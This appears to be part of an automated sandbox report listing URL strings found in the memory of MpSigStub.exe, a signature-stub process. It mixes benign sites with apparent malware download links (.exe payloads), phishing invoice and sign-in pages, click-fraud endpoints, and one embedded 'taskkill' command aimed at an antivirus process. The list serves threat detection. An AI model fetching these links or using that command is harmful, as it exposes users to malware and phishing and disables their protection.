Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://www.dutty.de/
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/cnfg/
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/cnfg/_poplkh
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/cnfg/canview.txt
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/cnfg/xh
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-jok.cn/count/updatedata.aspx?id=
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-mirrorsite.com/exit/movies1.html__
Source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-mirrorsite.com/exit/music
Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	String found in binary or memory: http://www.easypoint.kr/cashback/config.php
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.php
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.phpx
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.ebay.com
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.efixpctools.com
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://www.egy8.com
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://www.egy8.comx
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://www.elec-tb.com/tmp
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://www.empressdynasty.com/invoice-number-51356/
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.enerjisampiyonaku.com/logs/form.php
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://www.eomniform.com/OF5/nsplugins/OFMailX.cab
Source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp	String found in binary or memory: http://www.epoolsoft.com/pchunter/x
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://www.epoolstroi.ru/templates/im-start/css/fonts/canada%20post%20notice%20card.zip
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://www.esaof.edu.pt/templates/beez/images_general/xml/xiqueyhayudhxzzc.exe
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://www.ewrtw.pw/c/niubilityc.exe
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://www.exit7.net/
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: http://www.eyuyan.com)
Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp	String found in binary or memory: http://www.f2ko.de
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: http://www.facebookikiziniz.com/ext/r.php
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fakhfouri.com/sales-invoice/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.fastclick.com
Source: MpSigStub.exe, 00000023.00000003.6341569052.0000028BD6C4E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fastmp3player.com
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://www.fastmp3player.com/affiliates/
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://www.fastmp3player.com/affiliates/772465/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://www.fb.beirutmarathonculture.org/aos/aos/aos/index.htm)
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.fbcom.review/d/10.doc
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://www.fbcom.review/d/9.doc
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fbi.gov/index.htm
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	String found in binary or memory: http://www.fenomen-games.com/dhome.htm
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	String found in binary or memory: http://www.fenomen-games.com/dhome.htmxM
Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	String found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txt
Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	String found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txtxN
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fixarabul.com
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fixarasana.com
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.flashempire.com/
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: http://www.flashkin.net
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: http://www.fopo.com.ar/thiscodewascreatedon
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://www.friend-card.com/pickup.aspx?code=
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://www.friend-greeting.net/pickup.aspx?code=
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://www.friendgreeting.com/pickup.aspx?code=
Source: MpSigStub.exe, 00000023.00000003.6339389691.0000028BD7F38000.00000004.00000001.sdmp	String found in binary or memory: http://www.friskypotato.com/
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://www.friskypotato.com/codec/mp3/activecod3
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://www.g00gleadserver.com/list.txt
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://www.gamedanji.cn/ExeIni
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://www.general-insurance.net/wp-content/themes/general-ins-net/po
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://www.geocities.com/joke_haha2001
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://www.getip.pw
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.getpricefinder.com/
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.getsav-in.compublisheradpeak
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://www.gistery.trade/sys/designbolts.exe
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	String found in binary or memory: http://www.gnu.org/licenses/
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.go2000.cn/p/?q=
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://www.go2000.com/?4
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://www.go2000.com/?4aM
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://www.goldwindos2000.com/hkeraone/hker.htmwidht=0height=0
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://www.goldwindos2000.com/krratwo/hker.htm
Source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodtimesplayer.com/license.cgi?vidlock_params=
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.cn/search?complete=1&hl=zh-CN&inlang=zh-CN&newwindow=1&q=
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.cn/search?hl=zh-CN&q=
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.cn/search?q=%s
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com.br
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com.tr/
Source: MpSigStub.exe, 00000023.00000003.6243259523.0000028BC815A000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web
Source: MpSigStub.exe, 00000023.00000003.6243259523.0000028BC815A000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrerMicrosoft
Source: MpSigStub.exe, 00000023.00000003.6227003671.0000028BC70EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrercookienode.appendChild()
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://www.googleledal.com/traff1/go.php?sid=1
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.gooo.ru
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.gorillawalker.com
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://www.gratisweb.com/vaisefuder00
Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.greenpartnership.jp
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.greyhathacker.net/tools/
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://www.guzzotorino.it/ups-ship-notification
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://www.haibugmm.com/ba/yfctbzla
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://www.hao123.com/
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://www.hao123.com/?tn=
Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	String found in binary or memory: http://www.haosoft.net/
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://www.hasandanalioglu.com/wp-content/n_v/
Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.hjsdffsfs.aonecommercial.com
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.hljcm.com/c
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://www.hoarafushionline.net/extractf.php?x=
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://www.hoarafushionline.net/habeys.exe
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://www.hohosearch.com/?ts=
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://www.hotbar.com
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://www.hotdutchporn.net/cb/scripts/getAddressFromIP.php?wmid=
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://www.hotelelun.cl/
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://www.htylk.esy.es/nobe/downloaddocument-adobesignin.html
Source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.hustler-exclusive.com/
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: http://www.hxlive.cn
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://www.i-cash.de/
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.iask.com/s?k=%s
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.icbc.com.cn/
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.iciba.com/search?s=%s
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.icq.com
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://www.idownline.com/members/idownline
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.imobile.com.cn/
Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	String found in binary or memory: http://www.inet4you.com/exit/
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: http://www.infoaxe.com/enhancedsearchform.jsp
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://www.infoodesk.org/wizzy/wizzy/mailmine.html)
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: http://www.infotraffik-01.space/?
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.installmonetizer.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://www.instantmp3player.com
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip.com.cn/idcard.php?q=%s
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip.com.cn/ip.php?q=%s
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip.com.cn/mobile.php?q=%s
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip.com.cn/tel.php?q=%s
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip138.com
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip138.comx
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip2location.com/
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://www.ipvoips.com/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://www.isihodiernatunisi.com/online/zixmessage.htm)
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: http://www.istartsurf.com
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://www.itau.com.br
Source: MpSigStub.exe, 00000023.00000003.6273486144.0000028BD7B45000.00000004.00000001.sdmp	String found in binary or memory: http://www.j.mp/
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://www.j.mp/ajdddsdiocsjcjosdj
Source: MpSigStub.exe, 00000023.00000003.6279726781.0000028BD6C0C000.00000004.00000001.sdmp	String found in binary or memory: http://www.jajaan.com/ip.asp
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.jeegtube.com/databack.php
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://www.jejuseongahn.org/hboard4/data/cheditor/badu/alpha.php?v
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://www.jesuser.cn/plug/doSelect.asp?CMD=%s
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.joyo.com/
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://www.jplineage.com/firo/mail.asp?tomail=163
Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlinexl
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.jsonrpc.org/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://www.judios.org/paid-invoice-credit-card-receipt/
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://www.jword.jp/
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.kerstingutleder.at//p.o/next.php
Source: MpSigStub.exe, 00000023.00000003.6288865020.0000028BD7BC8000.00000004.00000001.sdmp	String found in binary or memory: http://www.key-logger.ws
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: http://www.klikspaandelft.nl/
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.komikeglence.com/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://www.kreher.tv/dhes/images/images/
Source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp	String found in binary or memory: http://www.kryogenix.org/code/browser/sorttable/
Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.kssoftware.ch
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://www.kuku530.com/?
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://www.kuku530.com/?Favorites
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://www.lindenmontessori.com/cgi-bin/hr_9x/
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.linkinc.es/scss/water.php
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: http://www.lis.eu
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: http://www.livecare.net/x
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://www.livejournal.com/search/?how=tm&area=default&q=%s
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://www.livejournal.com/search/?how=tm&area=default&q=%sx
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://www.lk2006.com/q15/index.htm
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.lollipop-network.com/privacy.php?lg=
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	String found in binary or memory: http://www.look2me.com
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://www.look2me.com/
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	String found in binary or memory: http://www.look2me.com/cgi
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	String found in binary or memory: http://www.look2me.com/products/
Source: MpSigStub.exe, 00000023.00000003.6265277219.0000028BD7767000.00000004.00000001.sdmp	String found in binary or memory: http://www.lop.com/search/
Source: MpSigStub.exe, 00000023.00000003.6265277219.0000028BD7767000.00000004.00000001.sdmp	String found in binary or memory: http://www.lop.com/search/xa
Source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp	String found in binary or memory: http://www.luckbird8.cn/
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://www.lumina.it/wp-content/plugins/all-in-one-wp-migration/storage/client/invoice-978561/
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://www.lwstats.com/11/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.lycos.com
Source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.macadwarecleaner.com
Source: MpSigStub.exe, 00000023.00000003.6267617568.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://www.macromedia.com/go/getflashplayer
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://www.maicaidao.com
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://www.mail-kunren.jp/sample2018jb1e/index.html?src=
Source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.maliciousurl-695dba18-2bb9-429a-a9a6-fe89a0eb945e.com/
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://www.manyakpc.com
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.mapquest.com
Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp	String found in binary or memory: http://www.mathrandomfloor/photo.txt?buttonnumdiskmlkjihgfed:
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.maxwebsearch.com/s?i_
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://www.mcmoney2012.com/fxf09.php
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.mediabusnetwork.com/phandler.php?pid=
Source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.mediafire.com/download/
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://www.meetchina.net/lib/html/index.php
Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp	String found in binary or memory: http://www.megafileupload.com/
Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp	String found in binary or memory: http://www.megasesso.ittaskkill/f/imavp.exetaskkill/f/imavp.exetaskkill/f/imavp.exetaskkill/f/imavp.
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.mickyfastdl.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp	String found in binary or memory: http://www.microname.co.kr
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://www.mindcrash.it/upload/galleriafotografica
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.mlb.com
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: http://www.mmviewer.com
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: http://www.mmviewer.com/post/
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://www.moliv.com.br/stat/email0702/
Source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.monitoreatufamilia.com
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.monster.com
Source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp	String found in binary or memory: http://www.mootolola.com/
Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: http://www.more4apps.com/
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://www.mp3codec.info
